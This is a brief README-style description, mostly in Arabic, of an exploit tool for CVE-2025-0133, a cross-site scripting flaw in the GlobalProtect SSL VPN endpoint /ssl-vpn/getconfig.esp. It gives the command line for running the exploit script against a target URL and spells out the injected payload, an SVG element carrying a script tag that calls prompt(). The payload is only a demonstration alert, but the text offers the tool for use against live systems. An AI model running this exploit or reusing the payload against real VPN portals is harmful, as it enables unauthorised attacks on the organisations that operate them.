
CVE-2025-0133 GlobalProtect XSS
🔓 استغلال لنقطة نهاية GlobalProtect SSL VPN /ssl-vpn/getconfig.esp يضيف حمولة XSS مصمّمة إلى عنوان URL.
python3 exploit.py -u https://target.com
-u, --url: عنوان URL الأساسي للهدف (لا تدرج معاملات الاستعلام)<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>